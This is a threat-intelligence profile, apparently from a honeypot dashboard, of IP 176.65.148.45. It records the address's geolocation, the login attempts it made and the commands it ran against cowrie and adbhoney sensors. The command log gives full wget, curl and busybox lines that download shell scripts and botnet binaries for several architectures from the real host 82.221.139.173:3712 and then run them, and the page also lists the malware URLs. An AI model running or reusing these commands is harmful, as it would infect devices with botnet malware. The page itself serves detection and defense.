Menace ActiveMOYEN

176.65.148.45

Pays d'Origine🇳🇱 Paises Bajos
Premiere Detection15/01/2026
Derniere Activite15/01/2026
FAIPfcloud UG (haftungsbeschrankt)
🎯
46
Attaques Totales
🔌
2
Ports
📡
2
Types d'Attaque
🦠
9
Malware

Geolocalisation

Pays
🇳🇱 Paises Bajos
Ville
Eygelshoven
ASN
AS51396
FAI
Pfcloud UG (haftungsbeschrankt)

Types d'Attaque

adbhoney
cowrie

Ports Attaques

555523

Malware Associe

Identifiants Tentes

🔐admin/admin
1x
🔐root/admin
1x

Commandes Executees

$cd /data/local/tmp/; busybox wget http://82.221.139.173:3712/w.sh; sh w.sh; curl http://82.221.139.173:3712/c.sh; sh c.sh; wget http://82.221.139.173:3712/wget.sh; sh wget.sh; curl http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox wget http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox curl http://82.221.139.173:3712/wget.sh; sh wget.sh5x
$cd /tmp;rm -rf RANGER2x
$wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm2x
$rm -rf RANGER1x
$wget http://82.221.139.173:3712/bins/systemx64.spc;chmod 777 systemx64.spc;./systemx64.spc TELNETspc1x
$wget http://82.221.139.173:3712/bins/systemx64.sh4;chmod 777 systemx64.sh4;./systemx64.sh4 TELNETsh41x
$wget http://82.221.139.173:3712/bins/systemx64.arm7;chmod 777 systemx64.arm7;./systemx64.arm7 TELNETarm71x
$wget http://82.221.139.173:3712/bins/systemx64.x86;chmod 777 systemx64.x86;./systemx64.x86 TELNETx861x
$wget http://82.221.139.173:3712/bins/systemx64.mpsl;chmod 777 systemx64.mpsl;./systemx64.mpsl TELNETmpsl1x

URLhaus Intel3 URLsabuse.ch

Cette IP a utilise les URLs malveillantes connues suivantes:

http://82.221.139.173:3712/c.sh
offlinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/wget.sh
offlinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/w.sh
offlinemalware_downloadgeofencedopendirsh

Evaluation des Risques

45
/100
FaibleMoyenEleveCritique